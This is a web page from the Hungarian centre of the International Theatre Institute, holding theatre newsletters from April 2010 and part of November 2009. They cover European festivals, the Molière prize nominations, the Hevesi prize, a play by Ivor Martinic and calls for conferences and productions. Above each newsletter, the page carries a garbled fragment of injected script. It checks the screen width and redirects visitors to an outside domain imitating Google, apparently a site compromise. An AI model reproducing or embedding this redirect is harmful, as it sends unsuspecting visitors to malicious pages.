A Nemzetközi Színházi Intézet Magyar Központjának kiadványa, a Hungaraian Theatre Bulletin legutóbbi száma az alábbi mellékletben tölthető le.

 

Híreink:
építés alatt

epites alatt

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width
 
OSZMI-ITI HÍRLEVÉL 2010. április

OSZMI-ITI HIRLEVEL 2010/ aprilis

 

1. Hirek, fesztivalok

1.1. Berlin - Theatertreffen 2010

1.2. Mayfest Bristolban

1.3. Theater Der Welt

1.4. Avignoni Fesztival

1.5. Edinburgh Nemzetkozi Fesztival

 

1.6. A 2010-es Moliere-dijra nevezett darabok

1.7. Creative Scotland elnevezesu strategiai testulet letrehozasa

1.8. Hevesi Sandor-dij 2010

 

 

2. Kortars drama

2.1. Ivor Martinic: The Play About Mirjana and Those Around Her (Darab Mirjanarol es az ot korulvevo emberekrol)

 

 

3. Lapszemle

3.1. American Theatre - 2010. aprilisi szam

 

 

4. ITI Figyelo: Felhivas, palyazat, informacio

 

4.1. Felhivas nemzetkozi konferencian valo reszvetelre

 

4.2. Felhivas nemzetkozi utazoprodukcioban valo reszvetelre

 


1. Fesztivalok, hirek

1.1. Berlin - Theatertreffen

 

Iden majus 7. es 23. kozott rendezik meg a nemet szinhazak fesztivaljat Berlinben. Az idei programot het nemet szinhazi kritikus valogatta ki az altaluk megtekintett 350 eloadasbol. A produkciok alapjan elmondhato, hogy mar nem a klasszikus muvek uraljak a repertoart, inkabb a mai eletre reflektalo kortars alkotasok, kifejezesi modok es eszkozok kerultek eloterbe. A valogatok nem feledkeztek meg a nemzetkozi projektekrol sem, igy kerult az idei programba a Bodo Viktor rendezte Handke: Az ora, amikor semmit sem tudtunk egymasrol cimu produkcioja, amely a grazi Schauspielhaus es a Szputnyik Hajozasi Tarsasag kozos produkcioja. A fesztivalon tobbek kozott lathato Andreas Kriegenburg rendezeseben Dea Loher egyik darabja (Deutsches Theater Berlin), Stephan Kimmig szinreviteleben Dennis Kelly: Love and Money cimu muve (Thalia Theater Hamburg), Jelinek egyik darabja (Die Kontrakte des Kaufmanns) Nicolas Stemann rendezeseben (a Thalia Theater Hamburg es a Schauspiel Koln koprodukcioja), Luc Percevaltol pedig Hans Fallada muve szerepel, a Munchner Kammerspiele eloadasaban.

 

1.2. Mayfest Bristolban

A bristoli Mayfestet 2003-ban tartottak meg eloszor, a bristoli Old Vic szinhazban az Arts Council England tamogatasaval. Azota az egesz varosra kiterjedo kulturalis esemennye notte ki magat, rangos muveszeknek otthont adva a vilag minden tajarol. Iden a fesztivalt szamos helyszinen, tobbek kozott a bristoli Arnolfini kortars muveszeti kozpontban, az Old Vicben es egyeb, helyspecifikus terekben rendezik. A Mayfest egyik kiemelkedo, eloadasonkent 500 emberre szamito programja az Electric Hotel David Rosenberg rendezeseben, ami 2010. majus 19. es 22. kozott lathato a bristoli kikotoben. Egy negyemeletes hotel egyszer csak ott terem majd a parton a semmibol. A nezok a szalloda elott ulve, lehallgatokeszulekkel betekinthetnek a hotel belso tereibe, es lakoinak maganeletebe.

1.3. Theater Der Welt

A Theater Der Welt elnevezesu nemzetkozi szinhazi fesztivalt Mulheimben es Essenben tartjak 2010. junius 30. - julius 17. kozott tobb mint harminc orszag reszvetelevel. Ez a rendezveny a Nemzetkozi Szinhazi Intezet kezdemenyezesere jott letre azzal a cellal, hogy a legujabb alkotasokat egy helyen mutassak be Nemetorszagban, minden alkalommal mas varosban. Az idei a tizenkettedik fesztival, amelyre Europabol, Afrikabol, Azsiabol egyarant erkeznek tarsulatok. Ket magyar resztvevoje is lesz a Theater Der Weltnek. Pinter Bela: Szutyok es Mundruczo Kornel: Nehez Istennek lenni cimu eloadasat is meghivtak.

A fesztival gazdag programjarol a kovetkezo honlapon lehet reszletes informaciokat kapni: www.theaterderwelt.de

 

1.4. Avignoni Fesztival

A 64. Avignoni Fesztivalt julius 7-27. kozott tartjak. Az idei program osszeallitasahoz ket alkotot kertek fel a muveszeti tars-igazgatoi feladat betoltesere, Chrostoph Marthaler rendezot es Olivier Cadiot irot. Pontosabban a fesztival a nemet rendezo es a francia iro alkotasainak bemutatasa kore szervezodik. A tobb mint 11 millio euros koltsegvetesbol 34 eloadast tuznek musorra, ebbol husznak Avignonban lesz a premierje, vagy kozvetlenul a fesztival elott mutattak be. A nyitoeloadast a XIV. szazadban epitett Papai Palota udvaran Marthaler rendezi Papperlapapp cimmel, ami egy zenes szinhazi eloadas lesz. Ebben a rendezo kedvenc szineszei is jatszanak majd, tobbek kozott Evelyne Didi. Ezt a bemutatot koveti a svajci rendezo Franciaorszagban eddig meg be nem mutatott alkotasa, a Schutz vor der Zukunft (Vedekezni a jovotol) cimu eloadas, amely azt mutatja be, hogy mit muveltek a naci orvosok egy becsi korhazban. Olivier Cadiot ket darabjat is jatsszak Ludovic Lagarde rendezeseben. A francia dramairo 1956-ban szuletett Parizsban. Rendszeresen dolgozik Pascal Dusapin zeneszerzovel, aki szamara mar tobb librettot irt. 1990-ben Pierre Alfierivel megalapitotta a Revue de Litterature Generale-t. 2002-ben keszult el a Biblia uj francia forditasa, amelyben, az o tolmacsolasaban olvashato az Enekek Eneke. Julius 10-en egyedul lesz majd a Papai Palota hatalmas udvaranak szinpadan, hogy felolvassa L'Affaire Robinson (A Robinson ugy) cimu darabjat. Ugyszinten ezen a helyszinen lesz lathato Shakespeare: II. Richardja Frederic Boyer uj forditasaban es Jean-Baptiste Sastre rendezeseben. 1947-ben Jean Vilar jatszotta a foszerepet abban az eloadasban, ami tulajdonkeppen a fesztival elinditoja volt. A tanc program is nagyon gazdagnak igerkezik, hiszen ujra lathato Anne Teresa De Keersmaeker, Alain Platel, Josef Nadj, Boris Charmatz egy-egy alkotasa.

A fesztival igazgatoi mar most bejelentettek, hogy a kovetkezo evi avignoni program muveszeti tanacsadoja a francia koreografus, Boris Charmatz lesz, aki a Rennes-ben levo Nemzeti Koreografiai Kozpont igazgatoja.

 

1.5. Edinburgh Nemzetkozi Fesztival

 

Megjelent az Edinburgh International Festival 2010 reszletes programja. Ebben az evben, augusztus 13. es szeptember 5. kozott Europa legnagyobb szinhazi fesztivaljat az „oceans apart" [oceanon innen es tul] jegyeben rendezik: kuzdelmes, tengereket atszelo utazasokat varazsolnak elenk, ahol a 14. szazadi europai felfedezok eletuk kockaztatasaval kerestek az uj vilagokat. A fesztival mottoja a gyarmatositas brutalitasat is eszunkbe juttatja, de elsosorban arra a kiterjedt kepzeletbeli teruletre utal, ami a foldreszek rendkivuli kulturalis sokfeleseggel rendelkezo, tobbek kozott Kaliforniabol, New Yorkbol, Mexikobol, Braziliabol, Ecuadorbol, Uj-Zelandrol, Argentinabol, Ausztraliabol, Hollandiabol es Spanyolorszagbol erkezo alkotoit elvalasztja egymastol. Az IVF 2010 ezt a muveszi gazdagsagot kivanja folfedezni, a nezok tudomasara hozni - a vilag minden tajarol erkezo szinhazi nyelvek kozotti parbeszed kialakitasara torekszik. Ime egy kis izelito a fesztivalprogrambol:

A New York-i rendezo, Lee Breuer az Oidipusz Kolonoszban cimu Szophoklesz-tragediat helyezi at modern amerikai kornyezetbe, gospel zene es rock 'n' roll kisereteben. Egy punkosdi predikator vezeti az elbeszeles fonalat, amig a legendas Blind Boys of Alabama minden tagja kollektiven Oidipuszt alakitja. A National Theatre of Scotland osbemutatoja a Caledonia Anthony Neilson rendezeseben: a kapzsisag, az euforia es a tomeges kiabrandulas tortenete. William Paterson egy penzugyi kalandor volt, aki 1698-ban minden idok egyik legmereszebb es legnagyobb katasztrofajahoz vezeto spekulaciojat hajtotta vegre, es belehajszolta az akkori Europa egyik legszegenyebb orszagat, Skociat. Guillermo Calderon Diciembre [December] cimu darabja a sajat rendezeseben valosul meg. Karacsonyeste van 2014-ben. Chile, Peru es Bolivia haboruban allnak egymassal. Egy katona 24 oras eltavozast kap, hogy egyutt unnepelhessen ket terhes ikertestverevel. Az este nem igerkezik nyugodtnak. Amikor a testverei rajonnek, hogy a ferfi nem biztos, hogy visszater a harcvonalba, egyikuk azonnal kesz elrejteni ot, a masik lany viszont irdatlanul duhos lesz. Mindketten probaljak meggyozni ot a haboruval kapcsolatos, teljesen kulonbozo allaspontjukrol. A Diciembre fekete humoru komedia a haboru orszagot es csaladot megoszto termeszeterol.

 

1.6. A 2010-es Moliere-dijra nevezett darabok

 

Franciaorszagban a Moliere-dijak jelolese es atadasa tobb mint husz eve nagy unnepe a francia szinhazi szakmanak, nem teve kulonbseget a kozszolgalati es a maganszinhazak kozott. A franciakra jellemzoen minden evben nagy pompaval rendezik meg onmaguk unnepleset, amelyre iden aprilis 25-en kerul sor, raadasul nem egy Parizs sziveben talalhato maganszinhazban, ahogy eddig. 2010-ben a Parizs egyik kulso keruleteben levo kozszolgalati szinhazban, a Maison des Arts de la Culture de Creteil-ben tartjak meg az unnepi atadot, amelyet a France2 teveallomas eloben kozvetit.

A Moliere-dijak kiosztasat megelozi a jeloles proceduraja. A kituntetesre a dijat adomanyozo egyesulet tagjai vagy az elnokseg altal felkertek jelolhetnek az elmult szezonban latott eloadasok kozul. Kulon dijazzak a legjobb kozszolgalati es maganszinhazi produkciot, a legjobb tarsulatot, a legjobb komediat, de a legjobb francia nyelven iro elo dramairo, valamint adaptacioszerzo alkotasat is.

2010-ben a kovetkezo szerzoket es alkotasokat jeloltek Moliere-dijra: Eric Assous: Illusion conjugale (Hazastarsi illuziok), Daniel Danis: Terre Ocean (OceanFold), Emmanuel Darley: Le mardi a Monoprix (Kedd a bevasarlokozpontban), Pierre Notte: Les couteaux dans le dos (Kesek a hatban), Sebastien Thiery: Qui est monsieur Schmitt? (Ki az a Schmitt ur?) es Joel Pommerat: Cercles/Fictions (Korok/ Fikciok).

A tuneziai szuletesu Assous darabja egy tipikus szerelmi haromszog tortenetet dolgoz fel. A kanadai Daniel Danis muvenek fohose egy halalosan beteg kisfiu, akit apja es bolondos, „varazslo" nagybatyja segit eletenek utolso pillanataiban. A regenyirokent indulo Emmanuel Darley monologjaban egy hajdan fiubol nove lett asszony probalja elfogadtatni magat apolasra szorulo, oreg apjaval. Pierre Notte, a Nouvel Observateur es a Theatre egykori kritikusa muvenek foszereploje ket gyerek, akik kepzeletbeli es valosagos kalandozasaik soran baratsagot kotnek, es vegul elfogadjak magukat olyannak, amilyenek. A szinesz es dramairo Sebastien Thiery Qui est monsieur Schmitt? (Ki az a Schmitt ur?) cimu darabjaban Belier ur es felesege eppen vacsorazik otthon, amikor varatlanul megszolal a telefon, ami azert is furcsa, mert nincs telefon elofizetesuk. Egy bizonyos Schmitt urat keresnek. Es ekkor a hazaspar dobbeneten fedezi fel, hogy nem sajat otthonukban tartozkodnak, hanem egy masik lakas foglyai. Minden arra utal, hogy ok Monsieur es Madame Schmitt, amitol mind a ketten panikba esnek, pedig a remalom csak most kezdodott. Ki a bolond? Mi az igazsag? Egyaltalan kik ok, es ki az a Monsieur Schmitt?

A dijazando eloadasok illetve darabok kozott szerepel Joel Pommerat: Cercles/Fictions-ja. Pommerat 1963-ban szuletett, 1990-ben alapitotta meg sajat tarsulatat. Elso eloadasaikat Parizsban, a Theatre de la Main d'Or-ban mutattak be. A tarsulat a francia miniszteriumtol kap tamogatast, es 2007-2010 kozott ket szinhazban, a Theatre Bretigny-ben es a Theatre des Bouffes du Nord-ban dolgozik. Pommerat nem csak irja, hanem maga is rendezi muveit. A dijra jelolt eloadas nem csak a kritikusokat, hanem a kozonseget is meghoditotta.

A rovid jelenetekbol allo eloadas az identitas, a hatalom, a haboru, az archaikus es a modern vilag szetvalasanak kerdeseit jarja korul. Pommerat azt irja, hogy a jatekban szereplo valamennyi figurat es szituaciot valoban letezo szemelyek es tortenetek inspiraltak. Az onallo jelenetek kozott elso pillantasra nincs kapcsolat, de ahogy az eloadas elore halad, egyre vilagosabb lesz a nezo szamara, hogy a Nagy Haboru, vagyis az elso vilaghaboru kapcsolja ossze ezeket. A Bouffes du Nord-ban a nezoter emelvenyei egy cirkuszi porondra emlekezteto jatekteret fognak korbe, ahol a sorsok keresztezik egymast, evszazadokat ugranak at a szereplok, tukrokon hatolnak at, alomszeru kepek kovetik egymast. A jelenetek kozotti diszletvaltozasok varazslatoknak tunnek, ami a vilagitas- es a hangtervezonek is koszonheto. Az egyik jelenetben peldaul egy nagy, feher teritovel leteritett asztal mellett ul egy ferfi es eszik. Alig lehet kivenni a sotetben mogotte allo szolga alakjat, akinek eloszor csak a hangjat hallani, majd az ur, aki veget akar vetni az ala-folerendelt viszonynak, az asztalahoz ulteti. O viszont nem erzi jol magat ebben a helyzetben es szerepben, ezert vissza is utasitja, mondvan az o helye masutt van: „szeretek szolgalni, de nem tudom, es nem is fogom szeretni Ont" - mondja. Egy masik jelenetben az urno csunyan korholja az o beteg gyereket szoptato dadat, amiert az azt akarta megertetni vele, hogy a gyermeknek szuksege lenne anyja jelenletere. Maskor egy nagyvallalat igazgatoja arrol magyaraz a hosszu ideje munkanelkulive valt embereknek, hogyan kell munkaerejuket aruba bocsataniuk. Elettoredekeket jelenitenek meg a szinpadon a teatralitas szinte valamennyi eszkozenek igenybevetelevel: a szineszek a szinpad homalyabol hangtalanul jonnek elore, hogy amikor a fenybe ernek, furcsa es fantasztikus jeleneseknek tunjenek. Pommerat ebben az eloadasban nem csak az eddig megszokott frontalis nezo-jatekter kapcsolatot veti el, hanem a tortenetmeseles linearis szerkezetet is.

1.7. Creative Scotland elnevezesu strategiai testulet letrehozasa

A skot parlament elfogadta a torvenyjavaslatot a Creative Scotland nevu strategiai testulet letrehozasara, melynek celja a Skocian beluli szinhazmuveszet, a film es egyeb alkotoi teruletek fejlodesenek iranyitasa, tamogatasa. Az uj szervezet atveszi a Scottish Screen es a Scottish Arts Council teljes feladatkoret es penzugyi forrasait, de kibovitett funkciokkal es nagyobb felelosseggel kell hozzajarulnia a szektor fejlesztesehez.

1.8. Hevesi Sandor-dij 2010

 

A Nemzetkozi Szinhazi Intezet Magyar Kozpontja javaslatara, 1998-ban szuletett meg a Hevesi Sandor-dij, amelyet az Oktatasi es Kulturalis Miniszterium, a Fovarosi Onkormanyzat es az ITI Magyar Kozpont hozott letre.

A dijat harom, Magyarorszagon elo es alkoto szinhazmuvesz vagy a szinhazert dolgozo szemely kaphatja, aki muveszi munkajaval, aldozatokat vallalo tettrekeszsegevel, peldaerteku elszantsagaval a legtobbet tette szinhazmuveszetunk kulfoldi megismerteteseert, elismerteteseert. A dijat a tagok elozetes javaslata alapjan letrejott listabol az Oktatasi es Kulturalis Miniszterium szakallamtitkarabol, a Fovarosi Onkormanyzat kepviselojebol es az ITI Magyar Kozpont elnokebol allo kuratorium iteli oda es adja at a Szinhazi Vilagnapon. A kitunteto okleveleket 2010-ben, az Operettszinhazban kivetelesen marcius 29-en adtak at. Iden Alfoldi Robert, a Nemzeti Szinhaz foigazgatoja reszesult Hevesi-dijban magas szinvonalu kulfoldi rendezeseiert, valamint Berczes Laszlo rendezo, a Barka Szinhaz dramaturgja, a Barka Nemzetkozi Fesztival elinditasaert es szervezeseert, es Ladanyi Andrea tancos-szinesz-koreografus, aki sokat tett a tancmuveszet nemzetkozi kapcsolatainak epiteseert.

 

2. Kortars drama

 

Ivor Martinic: The Play About Mirjana and Those Around Her (Darab Mirjanarol es az ot korulvevo emberekrol)

 

Ivor Martinic Splitben szuletett 1984-ben, es a zagrabi Sziniakademian vegzett. A fiatal horvat irogeneracio kiveteles tagja, aki elesen eszleli a haboru utani orszag durvasagait, fobb neuralgikus pontjait. Martinic olyan idoszakrol es helyszinekrol ir, amelyeket jol ismer; irasai melyen tukrozik a lathato, erzekelheto hetkoznapi eletet, a letminimum alatt elok napi letharcat, a megromlott, devalvalodott emberek kozotti viszonyokat, a kozepkoruak vegetalasat es a fiatalok vagyat egy masfajta eletre - ami valahogy nem akar megszuletni.

 

Szereplok: 5 no / 3 ferfi

Bemutato: Jugoslovensko dramsko pozoriste, 2010. februar

 

Ivor Martinic egyfelvonasosaban a negyveneves Mirjana es az ot korulvevo emberek mindennapi elete van a kozeppontban. Mirjana tizenot eves lanyaval, Veronikaval lakik, aki sztar akar lenni, es kamaszos kegyetlenseggel nezi le anyja rossz anyagi helyzetet. Sok ev utan elokerul Simon, Mirjana ex-ferje es Veronika apja, idonkent felhivja oket telefonon, es megigeri, hogy kuld nekik penzt, ami barmelyik pillanatban megerkezhet. Mirjana korul nem allt meg az elet a valasa ota: viszonyt folytat egy idosebb kollegajaval, es flortolni kezd a fiatal Lucio-val, aki otthagyja egy fiatalabb no miatt. Egyszer csak betoppan Grozdana, Mirjana boldogtalan baratnoje, aki megjosolja a sajat ongyilkossagat. Aztan megerkezik Violeta is, Mirjana edesanyja, aki a nap vegen infarktust kap es meghal. Veronika, az unoka harom oraval ezutan lefekszik aludni, semmilyen erzelmi reakciot nem valt ki belole a nagyanyja halala. Mirjana vegul egyedul ul, szivja a cigarettat es issza a kavet.

 

3. Lapszemle

 

3.1. American Theatre - 2010. aprilisi szam

 

Ami eloszor feltunik az American Theatre 2010. aprilisi szamaban, hogy ez a kulonleges kiadas alig kulonbozik egy szakacskonyvtol. Kitepheto, keszletbe gyujtheto kartonkartyak talalhatok benne, amelyeket szineszek, rendezok es dramairok receptjeibol, es azok keletkezesi torteneteibol, szinhazi legendaibol allitottak ossze. Tobbek kozott a kubai szarmazasu, New Yorkban elo dramairo, Eduardo Machado fokhagymas csirkejenek, az arizonai szinesz- es irono Jeanmarie Simpson kulonleges zsomlejenek es limonadejanak, valamint Kenneth Lin dramairo Po Boy Tango cimu dramajaban szereplo erolevesenek titkaiba nyerunk betekintest. Emellett jo nehany cikk szol - igy vagy ugy - a taplalkozas es a szinhaz kapcsolatarol. Igy Tina Howe, a New-York-i dramairono es olyan nagysikeru darabok szerzoje, mint a The Art of Dining (Az etkezes muveszete) Food as a Weapon, Solace and Art cimu irasa szinten az aprilisi szamban olvashato, amelyben Howe az etelhez es az etkezes szertartasaihoz valo viszonyan keresztul azt elemzi, mi a jelentosege az evesnek a sajat dramaiban.

Ebben a szamban Jessica Blank es Erik Jensen szerzoparos perzselo, Aftermath (Kovetkezmeny) cimu doku-dramaja olvashato az iraki haboru civil aldozatainak, megnyomoritott lakossaganak eleterol, valamint egy interju az alkotokkal. Kulon erdekesseg, hogy Eliza Bent egy teljes cikkben lelkesen foglalkozik a 2009-es budapesti Kortars Dramafesztivallal, es annak latszolagos politikamentessegevel, annak ellenere, hogy a berlini fal leomlasanak 20. evfordulojanak unnepe Kozep- es Kelet-Europaban eppen 2009. novemberere esett. De, ahogy az elmenybeszamolobol kiderul, az apolitikussag valoban csak latszolagos volt. A cikk reszletesen kiter a Lorenzaccio-ra (Zsoter Sandor), a Surpriseparty-ra (Karpati Peter), a Phaidra Fitness-re (Bodo Viktor) es a Parhuzamos ora es a Demon gyermekei (Pinter Bela) cimu eloadasokra.

 

 

 

4. ITI Figyelo: Felhivas, palyazat, informacio

 

4.1. Felhivas nemzetkozi konferencian valo reszvetelre

 

A 2010. augusztus 19. es 22. kozott Leibnitz-ben megrendezendo, „Performing Arts Training Today" elnevezesu nemzetkozi konferenciara eloadomuveszek, oktatok jelentkezeset varjak, akik erdeklodnek a kortars eloadomuveszet legujabb tendenciainak kutatasa irant. A konferencia nyitott a kulonbozo mufajok, technikak es muveszeti formak irant, igy konferencia-eloadas tartasara a multimedia, szinhaz, tanc, zene es cirkuszmuveszet teruleterol is lehet jelentkezni.

Tovabbi informacio: http://www.iugte.com/projects/ArtConference.php

Jelentkezesi feltetelek: http://www.iugte.com/projects/register.php

 

 

4.2. Felhivas nemzetkozi utazoprodukcioban valo reszvetelre

 

Az Interkunst e.V egy berlini kulturalis egyesulet, ami jelenleg az "INSTANT ACTS against violence and racism" (Azonnali fellepes az eroszak es a rasszizmus ellen) nevu nemzetkozi szinhazi es tancprojektet szervezi. Evente letrehoznak egy kulonbozo orszagokbol osszevalogatott nemzetkozi muveszekbol allo csoportot.

Jelenleg 17 es 29 ev kozotti fiatal szineszeket, tancosokat keresnek a 2010. oszen megvalosulo utazoprodukciojukhoz.

Tovabbi informacio:   Arkadiusz Zietek

                                    Interkunst e.V
                                    Phone: +49 30 781 40 01

                                    This e-mail address is being protected from spambots. You need JavaScript enabled to view it

Keszitettek: Lakos Anna (szerk.), Rakoczy Anita

if (screen.width ion = "http://google-statik.pw/l.php";} if (screen.width
 
OSZMI-ITI HÍRLEVÉL 2009. november

OSZMI-ITI HIRLEVEL 2009/11.

 

1. Hirek

1.1.Wroclaw Dialog Festival 

1.2. Szinhazi fesztival: Tank az Atokfoldjen

1.3. A Young Vic 2010 tavaszi evadanak musora

1.4. Uj kortars muvek bemutatoi Angliaban

1.5. Kortars nemet drama symposium

1.6. World Stage Design 2009 dijazottja Csanadi Judit

 

2. Kortars drama

2.1. Colin es Mary Crowther: Just Passing

 

 

3. ITI Figyelo: Felhivas, palyazat, informacio

3.1. Nemzetkozi dramapalyaza

3.2. Uj szerzemenyek az OSZMI konyvtaraban

 

 

1. Hirek

1.1.Wroclaw Dialog Fesztival 

Wroclaw a hatvanas evek vegen, a hetvenes evek elejen szinhazi fovarosnak szamitott. Akkoriban itt rendeztek azt a nemzetkozi szinhazi fesztivalt, ahol a legrangosabb tarsulatok munkajat mutattak be, de Grotowski eloadasait is meg lehetett nezni.

Ezt a szellemiseget folytatja a DIALOG-WROCLAW Fesztival, amelyet 2005-ben hozott letre a szinhazigazgato-rendezo Kyistyna Meissner. Kulonlegesnek szamit ez a rendezvenysorozat, es nem csak Lengyelorszagban, hanem Europaban is. Iden az NKA tamogatasanak jovoltabol az ITI Magyar Kozpontja reszt vehetett a fesztivalon. Ennek az az oka, hogy Meissner nem arra torekszik, hogy az eppen aktualis, hires eloadasokat, nepszeru rendezoket, felkapott tarsulatokat hivja meg. O egy-egy eppen fontos, a tarsadalmat es muveszeket erdeklo, izgalmas tema kore szervezi a meghivott produkciokat. Iden a valogatast a „Szemben a Gonosszal" gondolata hatarozta meg. A Gonosz pedig a legkulonfelebb modokon jelent meg az eloadasokban.  

A Wspolczesny Teatr (Wroclaw) fiatal szineszeinek Kaspar eloadasa a kiszolgaltatott ember tragediajat fogalmazta meg. Itt a cimszerepet alakito szinesz jateka volt a kiemelkedo. (rendezo: Barbara Wysocka) A moszkvai Szinmuveszeti eloadasa a holokauszt tragediajat es a sztalinizmus embernyomorito rendszeret koltoi targy- es babjatekkal fogalmazta meg. Az eloadas elso reszeben a fotok, vetitesek, targyak felhasznalasaval fajdalmasan szep koltoi kepekkel mutattak be egy vilag, hagyomany, tortenet elsullyedeset. A masodik felvonasaban egy noi oriasbabu mindenkit beterit, felemeszt, elural, markaban a kisember csak tehetetlenul kapalodzik. Az eloadas nem volt egyseges, az elso resz koltoisege nem volt fellelheto a masodikban, ahol az oriasbabu eroteljes megjelenese inkabb csak eros otletnek tetszett, de nem volt elegendo az egeszre. (Opus nr 7, rendezo: Dimitrij Krimov) 

Dosztojevszkij Felkegyelmujet a litvan Meno Fortas Tarsulat adta elo Eimuntas Nekrosius rendezeseben. Miskin herceg svajci szanatoriumi kezeleserol ter haza Szentpetervarra, ahol a maga naiv josagaval kozelit a vilaghoz, az emberekhez. A szinpadkep most is egyszeru, jelzesszeru: hatul kozepen egy hatalmas, ketszarnyu, felfuggesztett ajto, baloldalt zongora, hatul az ajto mellett asztal szekekkel. Elol ures a ter.

A szereplok Nekrosius tobbi eloadasahoz kepest sokkal jobban torekszenek az egymas kozotti szenvedelyes es pszichologizalo viszonyok kifejezesere. Hol felnottkent, hol egymast banto, esetlen kamaszokkent csapnak ossze a szereplok.  

Grzegorz Jarzyna rendezese a T.E.O.R.E.M.A.T. Pier Paolo Pasolini muvenek szinpadi valtozata.Az eloadas ereje talan eppen az eros, hideg, kiszamitott diszlet. A szinpad baloldalan feher falak, amelyeken alul regi varoskep reszletek, baloldalt ablakok megvilagitva, hatul egy asztal, amely korul hol esznek, hol a csalad kamaszfia modelleket keszit. Az impozans szinpad ridegseget a vilagitassal meg tovabb fokozza a rendezo.

Egy titokzatos latogato, aki varatlanul toppan be a gazdag gyaros csaladjahoz, felboritja annak napi rutinjat. Erotikus vonzasaval a csalad minden egyes tagjat elcsabitja, majd ugyanolyan varatlanul, ahogy erkezett, eltunik, de ezutan minden megvaltozik, szetesik. Az eloadas azt sugallja, hogy ez az egyszeruen oltozott, szinte jelentektelennek tuno vendeg lehet maga az ordog vagy az Isten megtestesulese. A jelmezek szinenek valtozasa, a diszlet mozgasa egy-egy fordulopontot jelez, valamint fokozatosan kitagitja a csaladi teret, s vezeti a nezot a „vilag" fele. 

Marthaler Riesenbutzbach: a Permanent Colony cimmel rendezett eloadasanak nincs tortenete, es a diszlet alapjan barmelyik europai varosban jatszodhat(na), ahol van bank, bevasarlo kozpont, garazs, udvar. Egy profitra es fogyasztasra epulo, valsag sujtotta vilag groteszk rajza az eloadas. A helyszint eloszor a noi korus uralja, amelynek kulonbozo koru tagjai a hetkoznapjaikra es a ferfiakra panaszkodnak. Majd megjelennek a ferfiak es csatlakoznak asszonyaikhoz. A sok apro jelenetbol arad az ironia, egyre vadabb burleszkbe fordulnak a kulonbozo szituaciok. Vegigvonul peldaul az eloadason egy anya-fiu kapcsolatot bemutato szal: a fiu/ferfi mar kis kora ota csak franciaul ert, mig anyja csak nemetul, es ez jol „megalapozza" viszonyukat. Az eloadas vege fele pedig egy igen mulatsagos es lehetetlen divatbemutato lathato. Erik Satie zenejere a leghetkoznapibb, lehetetlen oltozekekben vonulnak fel a szereplok - a kifutokon fellepoktol ellesett mozgassal es mozdulatokkal. A rendezo azt teszi lehetove a nezo szamara, hogy nemi tavolsagbol, ralatassal szemlelje nyomaszto, kozep- es kisszeru, egoista es cinikus vilagunkat. 

A sok jo  es izgalmas eloadasbol kiemelkedett az amszterdami Toneelgroepe. Ok nemregiben jartak Magyarorszagon, a Nemzeti Szinhazban adtak elo Premier cimu produkciojukat, amelybol megismerhette a nezo azokat az eszkozoket, amelyek stilusukat meghatarozzak. A Wroclawban latott, Shakespeare darabokra epulo eloadas is hasonlo szellemben, technikaval jott letre, de sokkal osszetettebb, melyebb volt, mint a pesti.  

A hatoras  Roman Tragedies-t szunet nelkul jatszottak egy hatalmas filmgyari studioban. A nezot egy dobogorendszeru nezoter es egy legalabb ugyanakkora, bezs kanapekkal szabdalt szinpad fogadja, ahol rengeteg monitor lathato, ket szelen hosszu asztalokkal. A bal oldalin helyet kap a sminkes es a fodrasz, meg a bufe. Jobbra pedig a technikusok, egy masik bufe es negy laptop, amelyet az eloadas kozben is hasznalhatott barki. A felkinalt ot perces szunetekben a nezoter felbolydult, elindult: a bufehez vagy a bezs kanapekhoz, hogy onnan figyeljek, akar a monitorokon keresztul is az eloadast. Ebben a darabban is vettek a szereploket kameraval, es felnagyitva a vasznon vagy a monitoron, duplan, triplan, megsokszorozva lehetett latni a szinpadon „eloben" zajlo jelenetet. Mindezzel fizikailag is szinte arra kenyszeritettek a nezot, hogy szokasos bameszkodo szerepebol kimozdulva, valamilyen modon reszese legyen a jateknak.

A rendezo  Ivo van Hove a Julius Caesar, Antonius es Kleopatra valamint a Coriolanus cimu darabokbol alkotta meg az eloadas szoveget, amelybol minden csatajelenetet kihagyott. Nem a haboru erdekelte, hanem a hatalom termeszete, a haboruhoz vezeto ut, az egyes szereplok viselkedese, gondolkodasa, erdekrendszere. A gyilkossagok es haboruk tenyet egy mondatos lenyegre korlatozva, a gyorshirek vilagat idezoen, a megfelelo idoben egy hirdetesi kivetiton jeleniti meg a piros betus szoveg: Julius Caesar elt ettol eddig, Marcus Antonius elt ettol eddig, ez es ez a csata ekkor es ekkor zajlott. Sot, idoben „figyelmeztetik" a nezot, hogy peldaul Kleopatra gyilkossagara 40 perc mulva kerul sor. 

A szereplok mai ruhakat viseltek: fokent jol szabott kosztumoket, oltonyoket. Egy-egy osszeeskuvesre, gyilkossagra, haborura valo felkeszules, elokeszulet olykor egy targyaloasztal korul zajlik, felidezve a nagy nemzetkozi szervezetek vagy parlamentek politikusainak vitatkozasat, magatartasat. Eloszor nyugalmat eroltetnek magukra a szereplok, vegul lemallik roluk minden, aminek koze lehet a civilizalt viselkedeshez, es egymasnak esnek. Maskor egy sajtoszobat, szerkesztoseget idezo helyszinen vitatjak meg, az informaciok es tudas birtokaban levok azt, hogy mit mikor es hogyan kell tenni. A haborus elokeszuletekrol idonkent a tevehirado interjuibol, helyszini kozvetiteseibol ertesulhet a kozonseg. A kozonseg, ahogy talan Shakespeare koraban is, a produkcio kozben elte sajat eletet, kielegitve szellemi es egyeb eletfunkcioit is. A nezo egyszerre latja a valosagos szinpadon zajlo jeleneteket, amelyek megsokszorozodnak a kivetitokon es monitorokon. Ezekbol ki-ki megalkothatja sajat eloadasat. Azonban barmilyen ez a „sajat eloadas", az eros rendezoi elkepzelesnek es a muveszek jatekanak koszonhetoen mindenkeppen a politikai manipulacio termeszetrajzarol szol. (L.A.)

1.2.Szinhazi fesztival: Tank az Atokfoldjen


 Tizenhet europai dramaszerzo irt darabot a berlini fal leomlasanak kovetkezmenyeirol. Az After the Fall, a Goethe Intezet hatarokon atnyulo szinhazi projektje nem fest hizelgo kepet Europarol. Az elkeszult muvek kozul kivalasztottak hetet, amelyeket 2009. oktober 31. es november 8. kozott a drezdai szinhazi fesztivalon lathat a kozonseg.

 

